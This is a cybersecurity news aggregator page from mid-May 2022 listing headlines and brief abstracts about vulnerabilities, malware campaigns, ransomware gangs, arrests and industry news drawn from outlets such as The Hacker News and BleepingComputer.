New research published by academics from KU Leuven, Radboud University, and the University of Lausanne has revealed that users' email addresses are exfiltrated to tracking, marketing, and analytics domains before the form is submitted and without prior consent. The study involved crawling 2.8 million pages from the top 100 websites, and found that as many as 1,844 websites allowed trackers to capture email addresses before form submission in the European Union, a number that jumped to 2,950 when the same set of websites were visited from the U.S. "Emails (or their hashes) were sent to 174 distinct domains (eTLD+1) in the U.S. crawl, and 157 distinct domains in the EU crawl," the researchers said. Furthermore, 52 websites were determined to be collecting passwords in the same manner, an issue that has since been addressed following responsible disclosure. LiveRamp, Taboola, Adobe, Verizon, Yandex, Meta Platforms, TikTok, Salesforce, Listrak, and Oracle accounted f... Source: The Hacker News
May 18, 2022 – Vulnerabilities
VMware Releases Patches for New Vulnerabilities Affecting Multiple Products
Abstract
VMware has issued patches to contain two security flaws impacting Workspace ONE Access, Identity Manager, and vRealize Automation that could be exploited to backdoor enterprise networks. The first of the two flaws, tracked as CVE-2022-22972 (CVSS score: 9.8), concerns an authentication bypass that could enable an actor with network access to the UI to gain administrative access without prior authentication. CVE-2022-22973 (CVSS score: 7.8), the other bug, is a case of local privilege escalation that could enable an attacker with local access to elevate privileges to the "root" user on vulnerable virtual appliances. "It is extremely important that you quickly take steps to patch or mitigate these issues in on-premises deployments," VMware said. The disclosure follows a warning from the U.S. Cybersecurity and Infrastructure Agency (CISA) that advanced persistent threat (APT) groups are exploiting CVE-2022-22954 and CVE-2022-22960 — two other VMware flaws t... Source: The Hacker News
May 18, 2022 – Criminals
Spanish police dismantle phishing gang that emptied bank accounts
Abstract
The Spanish police have announced the arrest of 13 people and the launch of investigations on another 7 for their participation in a phishing ring that defrauded at least 146 people. Source: BleepingComputer
May 18, 2022 – Phishing
New Phishing Attack Spreads Fileless Malware Trio
Abstract
A phishing campaign has been observed targeting Windows users with three different fileless malware to steal sensitive information. The three malware are identified as BitRAT, PandoraHVNC, and AveMariaRAT. VBA scripts and PowerShell are used to retrieve the malware and install it on the victim' ... Source: Cyware Alerts - Hacker News
May 18, 2022 – Education
How to Protect Your Data When Ransomware Strikes
Abstract
Ransomware is not a new attack vector. In fact, the first malware of its kind appeared more than 30 years ago and was distributed via 5.25-inch floppy disks. To pay the ransom, the victim had to mail money to a P.O. Box in Panama. Fast forward to today: affordable ransomware-as-a-service (RaaS) kits are available on the dark web for anyone to purchase and deploy, and attackers have an infinite number of channels available to them to infiltrate organizations as a result of reliance on cloud and mobile technologies. Initiating a ransomware attack is all about discreetly gaining access. And as employees can now access your data from anywhere, you have lost visibility into how they do so. To safeguard against these attacks, you're not just looking for malware; you need continuous insights into your users, the endpoints they use, and the applications and data they access. Lookout, a leader in endpoint-to-cloud security, has published an interactive infographic to help you visualiz... Source: The Hacker News
May 18, 2022 – Vulnerabilities
VMware fixed a critical auth bypass issue in some of its products Full Text
Abstract
VMware addressed a critical authentication bypass vulnerability "affecting local domain users" in multiple products. The virtualization giant warns that a threat actor can exploit the flaw, tracked as CVE-2022-22972 (CVSSv3 base score of 9.8),...Security Affairs
May 18, 2022 – Vulnerabilities
Critical Jupiter WordPress plugin flaws let hackers take over sites Full Text
Abstract
WordPress security analysts have discovered a set of vulnerabilities impacting the Jupiter Theme and JupiterX Core plugins for WordPress, one of which is a critical privilege escalation flaw.BleepingComputer
May 18, 2022 – Malware
UpdateAgent Updated with New Malware Dropper Full Text
Abstract
A new variant of UpdateAgent macOS malware was tracked, indicating ongoing attempts on the part of its authors to upgrade its functionalities. The new dropper is a Swift-based executable, which masquerades as Mach-O binaries such as PDFCreator and ActiveDirectory. It is recommended to stay a... (Cyware Alerts - Hacker News)
May 18, 2022 – Criminals
Researchers Expose Inner Workings of Billion-Dollar Wizard Spider Cybercrime Gang Full Text
Abstract
The inner workings of a cybercriminal group known as the Wizard Spider have been exposed, shedding light on its organizational structure and motivations. "Most of Wizard Spider's efforts go into hacking European and U.S. businesses, with a special cracking tool used by some of their attackers to breach high-value targets," Swiss cybersecurity company PRODAFT said in a new report shared with The Hacker News. "Some of the money they get is put back into the project to develop new tools and talent." Wizard Spider, also known as Gold Blackburn, is believed to operate out of Russia and refers to a financially motivated threat actor that's been linked to the TrickBot botnet, a modular malware that was officially discontinued earlier this year in favor of improved malware such as BazarBackdoor. That's not all. The TrickBot operators have also extensively cooperated with Conti, another Russia-linked cybercrime group notorious for offering ransomware-a... (The Hacker News)
May 18, 2022 – Attack
Microsoft warns of attacks targeting MSSQL servers using the tool sqlps Full Text
Abstract
Microsoft warns of brute-force attacks targeting Microsoft SQL Server (MSSQL) database servers exposed online. Microsoft warns of a new hacking campaign aimed at MSSQL servers in which threat actors are launching brute-force attacks against poorly protected... (Security Affairs)
May 18, 2022 – Breach
National bank hit by ransomware trolls hackers with dick pics Full Text
Abstract
After suffering a ransomware attack by the Hive operation, the Bank of Zambia made it clear that they were not going to pay by posting a picture of male genitalia and telling the hackers to s… (well, you can use your imagination).BleepingComputer
May 18, 2022 – Malware
New SYK Crypter Propagates via Discord Full Text
Abstract
Threat actors are abusing Discord's CDN with the new SYK crypter designed to dodge behavior-based security controls while opening a gate to different malware families, such as AsyncRAT, NanoCore RAT, and more. The increasing number of people using the community chat platform has continued attractin... (Cyware Alerts - Hacker News)
May 18, 2022 – Attack
Hackers Gain Fileless Persistence on Targeted SQL Servers Using a Built-in Utility Full Text
Abstract
Microsoft on Tuesday warned that it recently spotted a malicious campaign targeting SQL Servers that leverages a built-in PowerShell binary to achieve persistence on compromised systems. The intrusions, which leverage brute-force attacks as an initial compromise vector, stand out for their use of the utility "sqlps.exe," the tech giant said in a series of tweets. The ultimate goals of the campaign are unknown, as is the identity of the threat actor staging it. Microsoft is tracking the malware under the name "SuspSQLUsage." The sqlps.exe utility, which comes by default with all versions of SQL Server, enables an SQL Agent — a Windows service to run scheduled tasks — to run jobs using the PowerShell subsystem. "The attackers achieve fileless persistence by spawning the sqlps.exe utility, a PowerShell wrapper for running SQL-built cmdlets, to run recon commands and change the start mode of the SQL service to LocalSystem," Microsoft noted. Addi... (The Hacker News)
May 18, 2022 – Malware
Microsoft warns of the rise of cryware targeting hot wallets Full Text
Abstract
Microsoft researchers warn of the rising threat of cryware targeting non-custodial cryptocurrency wallets, also known as hot wallets. Microsoft warns of the rise of cryware, malicious software used to steal info and funds from non-custodial cryptocurrency... (Security Affairs)
May 18, 2022 – Criminals
US recovers $15 million from global Kovter ad fraud operation Full Text
Abstract
The US government has recovered over $15 million from Swiss bank accounts belonging to operators behind the '3ve' online advertising fraud scheme.BleepingComputer
May 18, 2022 – Ransomware
Chaos Ransomware Variant Sides with Russia Full Text
Abstract
Such actions have created tension internally within the threat actor groups as it has caused dissension, and externally, as organizations fear being targeted due to the political nature of the war.Fortinet
May 18, 2022 – Education
[eBook] Your 90-Day MSSP Plan: How to Improve Margins and Scale-Up Service Delivery Full Text
Abstract
To cash in on a thriving market, a managed security service provider (MSSP) must navigate unprecedented competition and complex challenges. The good news is that demand is through the roof: 69% of organizations plan to boost spending on cybersecurity in 2022. The bad news is that everyone wants a piece of the pie. MSSPs must outshine each other while fending off encroachments by traditional IT vendors and MSPs. As a result, some MSSPs are succumbing to the squeeze of low margins. Others are struggling to scale successfully. The most successful MSSPs are taking action to improve their current financial position while laying a foundation for long-term growth. A new eBook, "Your 90-Day MSSP Plan: How to Improve Margins and Scale Up Service Delivery," aims to help MSSPs understand the current cybersecurity landscape, their current position in it, what they do well, and where they can improve the most. This nine-step plan offers a clear path for MSSPs to boost profitab... (The Hacker News)
May 18, 2022 – Criminals
Conti Ransomware gang threatens to overthrow the government of Costa Rica Full Text
Abstract
The Conti ransomware gang is threatening to 'overthrow' the new government of Costa Rica after last month's attack. Last month, the Conti ransomware gang claimed responsibility for the attack on Costa Rica government infrastructure after the government... (Security Affairs)
May 18, 2022 – Government
DHS orders federal agencies to patch VMware bugs within 5 days Full Text
Abstract
The Department of Homeland Security's cybersecurity unit ordered Federal Civilian Executive Branch (FCEB) agencies today to urgently update or remove VMware products from their networks by Monday due to an increased risk of attacks.BleepingComputer
May 18, 2022 – General
Cybersecurity pros spend hours on issues that should have been prevented Full Text
Abstract
In a survey commissioned by Invicti, some 41% of the security professionals and 32% of the developers surveyed said they spend more than five hours each workday addressing security issues that should not have occurred in the first place.Tech Republic
May 18, 2022 – Government
U.S. Warns Against North Korean Hackers Posing as IT Freelancers Full Text
Abstract
Highly skilled software and mobile app developers from the Democratic People's Republic of Korea (DPRK) are posing as "non-DPRK nationals" in hopes of landing freelance employment in an attempt to enable the regime's malicious cyber intrusions. That's according to a joint advisory from the U.S. Department of State, the Department of the Treasury, and the Federal Bureau of Investigation (FBI) issued on Monday. Targets include financial, health, social media, sports, entertainment, and lifestyle-focused companies located in North America, Europe, and East Asia, with most of the dispatched workers situated in China, Russia, Africa, and Southeast Asia. The goal, the U.S. agencies warn, is to generate a constant stream of revenue that sidesteps international sanctions imposed on the nation and help serve its economic and security priorities, including the development of nuclear and ballistic missiles. "The North Korean government withholds up to 90 perce... (The Hacker News)
May 18, 2022 – Malware
Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift Full Text
Abstract
Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild. Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version...Security Affairs
May 18, 2022 – Attack
Chinese ‘Space Pirates’ are hacking Russian aerospace firms Full Text
Abstract
A previously unknown Chinese hacking group known as 'Space Pirates' targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems.BleepingComputer
May 18, 2022 – Vulnerabilities
Over 380,000 Kubernetes API Servers Exposed to Internet: Shadowserver Full Text
Abstract
ShadowServer is conducting daily scans of the IPv4 space on ports 443 and 6443, looking for IP addresses that respond with an HTTP 200 OK status, which indicates that the request has succeeded.Security Week
May 18, 2022 – Malware
Microsoft Warns of “Cryware” Info-Stealing Malware Targeting Crypto Wallets Full Text
Abstract
Microsoft is warning of an emerging threat targeting internet-connected cryptocurrency wallets, signaling a departure in the use of digital coins in cyberattacks. The tech giant dubbed the new threat "cryware," with the attacks resulting in the irreversible theft of virtual currencies by means of fraudulent transfers to an adversary-controlled wallet. "Cryware are information stealers that collect and exfiltrate data directly from non-custodial cryptocurrency wallets, also known as hot wallets," Berman Enconado and Laurie Kirk of the Microsoft 365 Defender Research Team said in a new report. "Because hot wallets, unlike custodial wallets, are stored locally on a device and provide easier access to cryptographic keys needed to perform transactions, more and more threats are targeting them." Attacks of this kind are not theoretical. Earlier this year, Kaspersky disclosed a financially-motivated campaign staged by the North Korea-based Lazarus Gr... (The Hacker News)
May 18, 2022 – Vulnerabilities
VMware patches critical auth bypass flaw in multiple products Full Text
Abstract
VMware warned customers today to immediately patch a critical authentication bypass vulnerability "affecting local domain users" in multiple products that can be exploited to obtain admin privileges.BleepingComputer
May 18, 2022 – General
The Vulnerable Maritime Supply Chain - a Threat to the Global Economy Full Text
Abstract
The merchant maritime sector functions with vessels that have been operational for anything from a few years to a few decades. The older vessels have had new technology added to improve efficiency through digitization and automation.Security Week
May 18, 2022 – Government
CISA shares guidance to block ongoing F5 BIG-IP attacks Full Text
Abstract
In a joint advisory issued today, CISA and the Multi-State Information Sharing and Analysis Center (MS-ISAC) warned admins of active attacks targeting a critical F5 BIG-IP network security vulnerability (CVE-2022-1388).BleepingComputer
May 18, 2022 – Breach
Data of 22.5 Million Malaysians Born 1940-2004 Allegedly Being Sold for $10,000 Full Text
Abstract
The alleged data leak involves information purportedly stolen from the National Registration Department (NRD). Local tech portal Amanz reported that the database, 160GB in size, is being sold for US$10,000 (S$13,846) on the dark web.Straits Times
May 18, 2022 – Criminals
Fake crypto sites lure wannabe thieves by spamming login credentials Full Text
Abstract
Threat actors are luring potential thieves by spamming login credentials for other people's accounts on fake crypto trading sites, illustrating once again that there is no honor among thieves.BleepingComputer
May 18, 2022 – APT
Bangladesh Added to Targets in Bitter APT’s Ongoing Campaign Full Text
Abstract
Cisco Talos revealed an ongoing campaign operated by the APT actor since August 2021. The campaign has been launched against an elite unit of the Bangladeshi government via spear-phishing emails.Cyware Alerts - Hacker News
May 18, 2022 – Attack
Microsoft warns of brute-force attacks targeting MSSQL servers Full Text
Abstract
Microsoft warned of brute-forcing attacks targeting Internet-exposed and poorly secured Microsoft SQL Server (MSSQL) database servers using weak passwords.BleepingComputer
May 17, 2022 – Vulnerabilities
iPhones Vulnerable to Attack Even When Turned Off Full Text
Abstract
Wireless features Bluetooth, NFC and UWB stay on even when the device is powered down, which could allow attackers to execute pre-loaded malware.Threatpost
May 17, 2022 – Attack
Russian Conti Ransomware Gang Threatens to Overthrow New Costa Rican Government Full Text
Abstract
The notorious Conti ransomware gang, which last month staged an attack on Costa Rican administrative systems, has threatened to "overthrow" the new government of the country. "We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power," the group said on its official website. "We have our insiders in your government. We are also working on gaining access to your other systems, you have no other options but to pay us." In a further attempt to increase pressure, the Russian-speaking cybercrime syndicate has raised its ransom demand to $20 million in return for a decryption key to unlock their systems. Another message posted on its dark web portal over the weekend issued a warning stating it will delete the decryption keys in a week, a move that would make it impossible for Costa Rica to recover access to the files encrypted by the ransomware. "I appeal to every resident of Costa R... (The Hacker News)
May 17, 2022 – Hacker
North Korean devs pose as US freelancers to aid DPRK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions.BleepingComputer
May 17, 2022 – Government
North Korean devs pose as US freelancers and aid DPRK govt hackers Full Text
Abstract
The U.S. government is warning that the Democratic People's Republic of Korea (DPRK) is dispatching its IT workers to get freelance jobs at companies across the world to obtain privileged access that is sometimes used to facilitate cyber intrusions.BleepingComputer
May 17, 2022 – Business
French group Thales buys two cybersecurity firms Full Text
Abstract
France's Thales said on Tuesday it had struck a deal with Sonae Investment Management to acquire two European cybersecurity companies, S21sec and Excellium, for an enterprise value of 120 million euros (~$125 million).Reuters
May 17, 2022 – Malware
UpdateAgent Returns with New macOS Malware Dropper Written in Swift Full Text
Abstract
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities. "Perhaps one of the most identifiable features of the malware is that it relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server," researchers from Jamf Threat Labs said in a report. UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections. The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed. "The primary difference [between the two executables] is that it reaches out to a different URL from wh... (The Hacker News)
May 17, 2022 – Policy and Law
President Biden’s Policy Changes for Offensive Cyber Operations Full Text
Abstract
Concerns about changes to the U.S. policy on offensive cyber operations raise an interesting and important question about the balance of power between the White House and the Department of Defense. But this is a poor framing of the problem.Lawfare
May 17, 2022 – Policy and Law
Venezuelan cardiologist accused of operating and selling Thanos ransomware Full Text
Abstract
The U.S. Justice Department accused a 55-year-old Venezuelan cardiologist of operating and selling the Thanos ransomware. The U.S. Justice Department accused Moises Luis Zagala Gonzalez, a 55-year-old cardiologist from Venezuela, of operating and selling...Security Affairs
May 17, 2022 – Vulnerabilities
NVIDIA fixes ten vulnerabilities in Windows GPU display drivers Full Text
Abstract
NVIDIA has released a security update for a wide range of graphics card models, addressing four high-severity and six medium-severity vulnerabilities in its GPU drivers.BleepingComputer
May 17, 2022 – Government
Beware of North Korean IT workers with fake credentials, US government warns Full Text
Abstract
The federal agencies said the freelancers often send money back to North Korea, contributing to its weapons programs, which have earned broad sanctions from the U.S. and United Nations.The Record
May 17, 2022 – General
Are You Investing in Securing Your Data in the Cloud? Full Text
Abstract
Traditional businesses migrating to the cloud need robust information security mechanisms. Gartner predicts that more than 95% of new digital workloads will continue to be deployed on cloud-native platforms by 2025. Robust cloud data security is imperative for businesses adopting rapid digital transformation to the cloud. While a traditional hosting model could be considered more secure, not all organizations are receptive to relinquishing control over their infrastructure or applications to a cloud provider, given the increased risk of data theft from an outsider's cyberattack. Having said that, let's try to understand the vital part. What is Cloud Data Security? Cloud data security entails securing data, whether at rest or in motion, on cloud-based infrastructure, applications, etc., against cyber threats like data breaches, unauthorized access, DDoS attacks, etc. This includes the technologies, policies, controls, and services to protect cloud-based system... (The Hacker News)
May 17, 2022 – Malware
Over 200 Apps on Play Store were distributing Facestealer info-stealer Full Text
Abstract
Experts spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used to steal sensitive data. Trend Micro researchers spotted over 200 Android apps on the Play Store distributing spyware called Facestealer used...Security Affairs
May 17, 2022 – Solution
Microsoft Defender for Endpoint gets new troubleshooting mode Full Text
Abstract
Microsoft says Defender for Endpoint now comes with a new 'troubleshooting mode' that will help Windows admins test Defender Antivirus performance and run compatibility scenarios without getting blocked by tamper protection.BleepingComputer
May 17, 2022 – Business
Access Orchestration Firm Pathlock Announces Several M&As and $200M Funding Full Text
Abstract
Pathlock on Tuesday announced mergers with ERP data security firm Appsian, and Security Weaver, a company that provides governance, risk, and compliance management (GRCM) software for SAP.Security Week
May 17, 2022 – Policy and Law
U.S. Charges Venezuelan Doctor for Using and Selling Thanos Ransomware Full Text
Abstract
The U.S. Justice Department on Monday accused a 55-year-old cardiologist from Venezuela of being the mastermind behind Thanos ransomware, charging him with the use and sale of the malicious tool and entering into profit sharing arrangements. Moises Luis Zagala Gonzalez, also known by the monikers Nosophoros, Aesculapius, and Nebuchadnezzar, is alleged to have both developed and marketed the ransomware to other cybercriminals to facilitate the intrusions and get a share of the bitcoin payment. If convicted, Zagala faces up to five years' imprisonment for attempted computer intrusion, and five years' imprisonment for conspiracy to commit computer intrusions. "The multi-tasking doctor treated patients, created and named his cyber tool after death, profited from a global ransomware ecosystem in which he sold the tools for conducting ransomware attacks, trained the attackers about how to extort victims, and then boasted about successful attacks, including by malicious... (The Hacker News)
May 17, 2022 – Government
CISA adds CVE-2022-30525 flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
US Critical Infrastructure Security Agency (CISA) adds critical CVE-2022-30525 RCE flaw in Zyxel Firewalls to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency added the recently disclosed...Security Affairs
May 17, 2022 – General
Cybersecurity agencies reveal top initial access attack vectors Full Text
Abstract
A joint security advisory issued by multiple national cybersecurity authorities revealed today the top 10 attack vectors most exploited by threat actors for breaching networks.BleepingComputer
May 17, 2022 – Breach
Ransomware-as-a-Service Operator AvosLocker Claims Data Theft from Another Healthcare Entity Full Text
Abstract
In its most recent assault against a healthcare entity, ransomware-as-a-service operator AvosLocker claims to be behind an attack allegedly involving data theft from Texas-based CHRISTUS Health.Gov Info Security
May 17, 2022 – Botnet
New Sysrv Botnet Variant Hijacking Windows and Linux with Crypto Miners Full Text
Abstract
Microsoft is warning of a new variant of the Sysrv botnet that's exploiting multiple security flaws in web applications and databases to install coin miners on both Windows and Linux systems. The tech giant, which has called the new version Sysrv-K, is said to weaponize an array of exploits to gain control of web servers. The cryptojacking botnet first emerged in December 2020. "Sysrv-K scans the internet to find web servers with various vulnerabilities to install itself," the company said in a series of tweets. "The vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution vulnerabilities." This also includes CVE-2022-22947 (CVSS score: 10.0), a code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host via a maliciously crafted request. It's worth noting that the abuse of CVE-2022-22947 has prompted the U.S. Cyb... (The Hacker News)
May 17, 2022 – Malware
A custom PowerShell RAT used to target German users with the Ukraine crisis as bait Full Text
Abstract
Researchers spotted a threat actor using a custom PowerShell RAT targeting German users to gain intelligence on the Ukraine crisis. Malwarebytes experts uncovered a campaign that targets German users with a custom PowerShell RAT. The threat... (Security Affairs)
May 17, 2022 – Vulnerabilities
Hackers can steal your Tesla Model 3, Y using new Bluetooth attack Full Text
Abstract
Security researchers at the NCC Group have developed a tool to carry out a Bluetooth Low Energy (BLE) relay attack that bypasses all existing protections to authenticate on target devices.BleepingComputer
May 17, 2022 – Education
Best practices for healthcare delivery organizations to manage supply chain cybersecurity risks Full Text
Abstract
Drafted by the Health Information Management Working Group, the report provides best practices that healthcare delivery organizations (HDOs) can use to manage the cybersecurity risks associated with their supply chains.Help Net Security
May 17, 2022 – Malware
Over 200 Apps on Play Store Caught Spying on Android Users Using Facestealer Full Text
Abstract
More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called Facestealer to siphon user credentials and other valuable information. "Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a new report. "Since its discovery, the spyware has continuously beleaguered Google Play." Facestealer, first documented by Doctor Web in July 2021, refers to a group of fraudulent apps that invade the official app marketplace for Android with the goal of plundering sensitive data such as Facebook login credentials. Of the 200 apps, 42 are VPN services, followed by camera (20) and photo editing applications (13). In addition to harvesting credentials, the apps are also designed to collect Facebook cookies and personally identifiable information associated with a vic... (The Hacker News)
May 17, 2022 – General
What is ISO 27001 and Why it Matters for Compliance Standards Full Text
Abstract
ISO 27001 may seem like a big undertaking, but the certification can pay off in more ways than one—including overlap with compliance regulations. Read about the benefits of ISO 27001 and how to get started.BleepingComputer
May 17, 2022 – Business
Pangea Lands $25 Million Investment for API Security Services Full Text
Abstract
Pangea, the brainchild of serial entrepreneur Oliver Friedrichs, said the Series A funding round was led by Ballistic Ventures, a new investment firm focused exclusively on cybersecurity companies.Security Week
May 17, 2022 – Vulnerabilities
CISA warns admins to patch actively exploited Spring, Zyxel bugs Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added two more vulnerabilities to its list of actively exploited bugs, a code injection bug in the Spring Cloud Gateway library and a command injection flaw in Zyxel firmware for business firewalls and VPN devices.BleepingComputer
May 17, 2022 – Government
FBI Warns of Hackers Using Malicious PHP Code to Steal Credit Card Data Full Text
Abstract
The attackers began targeting US businesses in September 2020 by inserting malicious PHP code into the customized online checkout pages. But earlier this year, the actors changed tactics using a different PHP function.ZDNet
May 17, 2022 – Attack
Hackers target Tatsu WordPress plugin in millions of attacks Full Text
Abstract
Hackers are massively exploiting a remote code execution vulnerability, CVE-2021-25094, in the Tatsu Builder plugin for WordPress, which is installed on about 100,000 websites.BleepingComputer
May 17, 2022 – Cryptocurrency
How cryptocurrencies enable attackers and defenders Full Text
Abstract
A rise in the popularity of cryptocurrency-based crime, doubled with a lack of regulation, has paved the way for cybercriminals to extort vast amounts of money from legitimate organizations.Tech Target
May 16, 2022 – Attack
Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency on Monday added two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its Known Exploited Vulnerabilities Catalog, citing evidence of active exploitation. Tracked as CVE-2022-30525, the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system. Impacted devices include the USG FLEX 100, 100W, 200, 500, and 700; USG20-VPN and USG20W-VPN; ATP 100, 200, 500, 700, and 800; and the VPN series. The issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7. Merely a day later, the Shadowserver Foundation said it began detecting exploitation attempts,... (The Hacker News)
May 16, 2022 – Phishing
HTML attachments remain popular among phishing actors in 2022 Full Text
Abstract
HTML files remain one of the most popular attachments used in phishing attacks for the first four months of 2022, showing that the technique remains effective against antispam engines and works well on the victims themselves.BleepingComputer
May 16, 2022 – Attack
Nerbian RAT Spreads via Emails in Ongoing Attacks Full Text
Abstract
Nerbian RAT is impersonating the WHO and pretends to contain important information regarding COVID-19. It is currently targeting entities in Italy, Spain, and the U.K. Deploy anti-phishing solutions and email gateways to stay protected.Cyware Alerts - Hacker News
May 16, 2022 – Vulnerabilities
Researchers Find Potential Way to Run Malware on iPhone Even When it’s OFF Full Text
Abstract
A first-of-its-kind security analysis of the iOS Find My function has identified a novel attack surface that makes it possible to tamper with the firmware and load malware onto a Bluetooth chip that's executed while an iPhone is "off." The mechanism takes advantage of the fact that wireless chips related to Bluetooth, Near-field communication (NFC), and ultra-wideband (UWB) continue to operate while iOS is shut down when entering a "power reserve" Low Power Mode (LPM). While this is done so as to enable features like Find My and facilitate Express Card transactions, all three wireless chips have direct access to the secure element, academics from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt said in a paper. "The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM," the researchers said. "Since LPM support is impleme... (The Hacker News)
May 16, 2022 – Vulnerabilities
Apple fixes the sixth zero-day since the beginning of 2022 Full Text
Abstract
Apple released security updates to address a zero-day bug actively exploited in attacks against Macs and Apple Watch devices. Apple has addressed a zero-day vulnerability, tracked as CVE-2022-22675, actively exploited in attacks aimed at Macs and Apple...Security Affairs
May 16, 2022 – Privacy
Third-party web trackers log what you type before submitting Full Text
Abstract
An extensive study looking into the top 100k ranking websites has revealed that many are leaking information you enter in the site forms to third-party trackers before you even press submit.BleepingComputer
May 16, 2022 – Vulnerabilities
SharePoint RCE bug resurfaces three months after being patched by Microsoft Full Text
Abstract
The flaw, a variant on an issue that was patched in February, uses the site creation features of SharePoint, Microsoft’s intranet platform, to upload and run malicious files on the server.The Daily Swig
May 16, 2022 – General
Fake Clickjacking Bug Bounty Reports: The Key Facts Full Text
Abstract
Are you aware of fake clickjacking bug bounty reports? If not, you should be. This article will get you up to speed and help you to stay alert. What are clickjacking bug bounty reports? If we start by breaking up the term into its component parts, a bug bounty is a program offered by an organization, in which individuals are rewarded for finding and reporting software bugs. These programs are often used by companies as a cost-effective way to find and fix software vulnerabilities, thereby improving the security of their products. They also help to build goodwill with the security community. For the bounty hunters (or white hat hackers), they have an opportunity to earn money and recognition for their skills. Clickjacking is a malicious technique used to trick users into clicking on something that they think is safe, but is actually harmful. For example, a hacker could create a fake button that looks like the "like" button on a social media site. When users click on it,... (The Hacker News)
May 16, 2022 – Vulnerabilities
Experts show how to run malware on chips of a turned-off iPhone Full Text
Abstract
Researchers devised an attack technique to tamper with the firmware and execute malware on a Bluetooth chip while an iPhone is "off." A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated...Security Affairs
May 16, 2022 – Ransomware
US links Thanos and Jigsaw ransomware to 55-year-old doctor Full Text
Abstract
The US Department of Justice today said that Moises Luis Zagala Gonzalez (Zagala), a 55-year-old cardiologist with French and Venezuelan citizenship residing in Ciudad Bolivar, Venezuela, created and rented Jigsaw and Thanos ransomware to cybercriminals.BleepingComputer
May 16, 2022 – Malware
Fake Mobile Apps Steal Facebook Credentials, Cryptocurrency-Related Keys Full Text
Abstract
Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants. Since its discovery, the spyware has continuously beleaguered Google Play.Trend Micro
May 16, 2022 – Malware
Researchers Warn of “Eternity Project” Malware Service Being Sold via Telegram Full Text
Abstract
An unidentified threat actor has been linked to an actively in-development malware toolkit called the "Eternity Project" that lets professional and amateur cybercriminals buy stealers, clippers, worms, miners, ransomware, and a distributed denial-of-service (DDoS) bot. What makes this malware-as-a-service (MaaS) stand out is that besides using a Telegram channel to communicate updates about the latest features, it also employs a Telegram Bot that enables the purchasers to build the binary. "The [threat actors] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies," researchers from Cyble said in a report published last week. Each of the modules can be leased separately and provides paid access to a wide variety of functions - Eternity Stealer ($260 for an annual subscription) - Siphon passwords, cookies, credit cards, browser cryptocurrency extensions, cryptThe Hacker News
May 16, 2022 – Policy and Law
Ukrainian national sentenced to 4 years in prison for selling access to hacked servers Full Text
Abstract
A 28-year-old Ukrainian national has been sentenced to four years in prison for selling access to hacked servers. Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old Ukrainian national, has been sentenced to four years in prison for selling access to compromised...Security Affairs
May 16, 2022 – Vulnerabilities
Apple emergency update fixes zero-day used to hack Macs, Watches Full Text
Abstract
Apple has released security updates to address a zero-day vulnerability that threat actors can exploit in attacks targeting Macs and Apple Watch devices.BleepingComputer
May 16, 2022 – Phishing
This phishing attack delivers three forms of malware. And they all want to steal your data Full Text
Abstract
Detailed by cybersecurity researchers at Fortinet, those who unintentionally run the malicious attachment sent in phishing emails fall victim to AveMariaRAT, BitRAT and PandoraHVNC trojan malware.ZDNet
May 16, 2022 – General
Eternity Project: You can pay $260 for a stealer and $490 for a ransomware Full Text
Abstract
Researchers from threat intelligence firm Cyble analyzed the Eternity Project Tor website, which offers any kind of malicious code. Researchers at cybersecurity firm Cyble analyzed a Tor website named ‘Eternity Project' that offers for sale...Security Affairs
May 16, 2022 – Attack
Ukraine supporters in Germany targeted with PowerShell RAT malware Full Text
Abstract
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT (remote access trojan) and stealing their data.BleepingComputer
May 16, 2022 – General
Researchers warn of APTs, data leaks as serious threats against UK financial sector Full Text
Abstract
APTs target organizations worldwide and those located in the UK are no exception. Over the past few years, APTs including the Chinese APT40 and APT31 have utilized vulnerabilities including ProxyLogon to compromise UK businesses.ZDNet
May 16, 2022 – Government
CISA warns not to install May Windows updates on domain controllers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has removed a Windows security flaw from its catalog of known exploited vulnerabilities due to Active Directory (AD) authentication issues caused by the May 2022 updates that patch it.BleepingComputer
May 16, 2022 – Breach
